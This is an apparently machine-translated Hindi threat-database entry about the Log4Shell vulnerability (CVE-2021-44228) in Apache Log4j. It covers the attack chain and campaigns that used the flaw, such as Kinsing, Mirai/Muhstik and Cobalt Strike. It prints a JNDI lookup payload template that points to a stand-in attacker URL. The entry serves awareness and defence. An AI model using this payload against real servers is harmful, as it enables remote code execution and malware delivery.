Threat Database Vulnerability Log4Shell Vulnerability

Log4Shell Vulnerability

10 दिसंबर, 2021 को, Apache Log4j जावा-आधारित लॉगिंग प्लेटफॉर्म में एक गंभीर भेद्यता के लिए एक शोषण जारी किया गया थासार्वजनिक रूप से। CVE-2021-44228 या Log4Shell के रूप में ट्रैक किया गया, भेद्यता Log4j 2.0-बीटा9 से Log4j संस्करणों और 2.14.1 तक को प्रभावित करती है। गैर-प्रमाणित रिमोट एक्सेस स्थापित करने, कोड निष्पादित करने, मैलवेयर खतरों को वितरित करने या जानकारी एकत्र करने के लिए थ्रेट एक्टर्स शोषण का लाभ उठा सकते हैं। भेद्यता को एक महत्वपूर्ण स्थिति दी गई है क्योंकि Log4j का व्यापक रूप से एंटरप्राइज़ एप्लिकेशन और क्लाउड सेवाओं द्वारा उपयोग किया जाता है।

Log4Shell तकनीकी विवरण

शोषण की शुरुआत धमकी देने वाले अभिनेता द्वारा अपने वेब ब्राउज़र के उपयोगकर्ता एजेंट को बदलने से होती है। फिर वे किसी साइट पर जाते हैं या प्रारूप के साथ वेबसाइटों पर मौजूद विशिष्ट स्ट्रिंग की खोज करते हैं:

${jndi:ldap://[attacker_URL]}

परिणामस्वरूप, स्ट्रिंग को वेब सर्वर के एक्सेस लॉग में जोड़ दिया जाएगा। फिर हमलावर इन लॉग को पार्स करने और संलग्न स्ट्रिंग तक पहुंचने के लिए Log4j एप्लिकेशन की प्रतीक्षा करते हैं। इस उदाहरण में, बग ट्रिगर होगा, जिससे सर्वर JNDI स्ट्रिंग में मौजूद URL पर कॉलबैक करेगा। उस यूआरएल का दुरुपयोग बेस 64-एन्कोडेड कमांड या जावा क्लासेस को संभालने के लिए किया जाता हैबाद में और उन्हें समझौता किए गए डिवाइस पर निष्पादित करें।

अपाचे ने जल्दी से एक नया संस्करण - Log4j 2.15.0 जारी किया, शोषण को संबोधित करने और ठीक करने के लिए, लेकिन एक महत्वपूर्ण मात्रा में कमजोर सिस्टम लंबी अवधि के लिए अप्रकाशित रह सकते हैं। उसी समय, धमकी देने वाले अभिनेताओं ने तुरंत Log4Shell शून्य-दिन की भेद्यता पर ध्यान दिया और शोषण के लिए उपयुक्त सर्वरों के लिए स्कैनिंग शुरू कर दी। इन्फोसेक समुदाय ने मैलवेयर खतरों की एक विस्तृत रेंजर देने के लिए Log4Shell को नियोजित करने वाले कई हमले अभियानों को ट्रैक किया है।

Log4Shell का उपयोग क्रिप्टोमिनर, बॉटनेट, पिछले दरवाजे और डेटा-संग्रह हमलों में किया जाता है

अपने संचालन में Log4Shell को लागू करने वाले पहले खतरे वाले अभिनेताओं में से एक Kinsing क्रिप्टो-माइनिंग बॉटनेट के पीछे साइबर अपराधी थे। हैकर्स ने Log4Shell का उपयोग बेस64-एन्कोडेड पेलोड वितरित करने और शेल स्क्रिप्ट चलाने के लिए किया। इन लिपियों की भूमिका लक्षित प्रणाली को प्रतिस्पर्धी क्रिप्टो-खनन खतरों से अपने स्वयं के किन्सिंग मैलवेयर के निष्पादित होने से पहले साफ करना है।

नेटलैब 360 ने उल्लंघन किए गए उपकरणों पर Mirai और Muhstik बॉटनेट के संस्करण स्थापित करने के लिए भेद्यता का उपयोग करने वाले खतरे वाले अभिनेताओं का पता लगाया। इन मैलवेयर खतरों को संक्रमित सिस्टम को IoT उपकरणों और सर्वरों के नेटवर्क में जोड़ने के लिए डिज़ाइन किया गया है, जिसे हमलावर तब DDoS (डिस्ट्रिब्यूटेड डेनियल-ऑफ-सर्विस) हमलों को लॉन्च करने या क्रिप्टो-माइनर्स को तैनात करने का निर्देश दे सकते हैं।बाद में।

Microsoft थ्रेट इंटेलिजेंस सेंटर के अनुसार, Log4j कारनामे को कोबाल्ट स्ट्राइक बीकन छोड़ने वाले हमले अभियानों द्वारा भी लक्षित किया गया था। कोबाल्ट स्ट्राइक एक वैध सॉफ्टवेयर उपकरण है जिसका उपयोग कंपनी की सुरक्षा प्रणालियों के खिलाफ पैठ परीक्षण के लिए किया जाता है।हालांकि, इसकी पिछले दरवाजे की क्षमताओं ने इसे कई खतरे वाले अभिनेता समूहों के शस्त्रागार का एक सामान्य हिस्सा बना दिया है। बाद में, पीड़ित के नेटवर्क पर अवैध पिछले दरवाजे का उपयोग अगले चरण के पेलोड जैसे रैंसमवेयर, सूचना-चोरी करने वाले और अन्य मैलवेयर खतरों को वितरित करने के लिए किया जाता है।

Log4Shell का उपयोग सर्वर डेटा वाले पर्यावरण चर प्राप्त करने के लिए किया जा सकता है। इस तरह, हमलावर होस्ट का नाम, OS नाम, OS संस्करण संख्या, उपयोगकर्ता नाम जिसके तहत Log4j सेवा चल रही है और बहुत कुछ प्राप्त कर सकते हैं।

रुझान

सबसे ज्यादा देखा गया

लोड हो रहा है...